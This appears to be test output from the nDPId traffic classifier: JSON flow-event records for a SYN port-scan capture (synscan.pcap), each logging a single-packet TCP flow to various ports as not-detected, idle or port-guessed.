+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":999,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
